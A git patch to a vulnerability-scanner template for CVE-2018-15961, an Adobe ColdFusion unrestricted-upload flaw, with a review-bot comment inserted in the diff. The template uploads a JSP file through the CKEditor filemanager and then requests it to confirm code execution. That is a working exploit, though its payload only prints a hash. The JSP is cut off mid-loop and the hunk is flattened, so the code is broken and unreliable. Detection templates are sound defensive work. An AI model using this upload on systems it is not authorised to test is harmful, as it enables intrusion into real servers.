From 33a733d4f63f90a722cf3b0ef69de12bdacf977e Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 11 Nov 2021 15:05:31 +0530
Subject: [PATCH] misc updates
---
 cves/2018/CVE-2018-15961.yaml | 36 +++++++++++++++++++++++++----------
 1 file changed, 26 insertions(+), 10 deletions(-)
diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml
index 15dd4b5ea2..3055bdfd6f 100644
--- a/cves/2018/CVE-2018-15961.yaml
+++ b/cves/2018/CVE-2018-15961.yaml
@@ -1,13 +1,14 @@
 id: CVE-2018-15961
 info:
- name: CVE-2018-15961
+ name: Adobe ColdFusion Unrestricted file upload RCE
 author: SkyLark-Lab,ImNightmaree
 severity: critical
+ description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
 reference:
- - https://github.com/vah13/CVE-2018-15961
- - https://www.cvedetails.com/cve/CVE-2018-15961/
- tags: adobe,cve,cve2018,rce,coldfusion,fileupload
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-15961
+ - https://github.com/xbufu/CVE-2018-15961
+ tags: cve,cve2018,adobe,rce,coldfusion,fileupload
 requests:
 - raw:
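Review bot: The added `description` says "Update 6 and earlier, and Update 14 and earlier" without naming the ColdFusion release line each update number belongs to, so someone triaging a hit cannot tell from the template alone whether an installed build is in range. I would reword it along the lines of `ColdFusion <release> Update 6 and earlier, and ColdFusion <release> Update 14 and earlier`, filling in the releases from the vendor bulletin. In the same hunk the `reference` list swaps one third-party proof-of-concept repository for another; adding the vendor's security bulletin next to the NVD link would give defenders the patch and fixed-version information directly.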
@@ -20,24 +21,39 @@ requests: Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg - <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%> + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2018-15961"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i -----------------------------24464570528145 Content-Disposition: form-data; name="path" {{randstr}}.jsp -----------------------------24464570528145-- - - method: GET - path: - - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" + - | + GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - type: word - part: body words: - - "18188751" + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: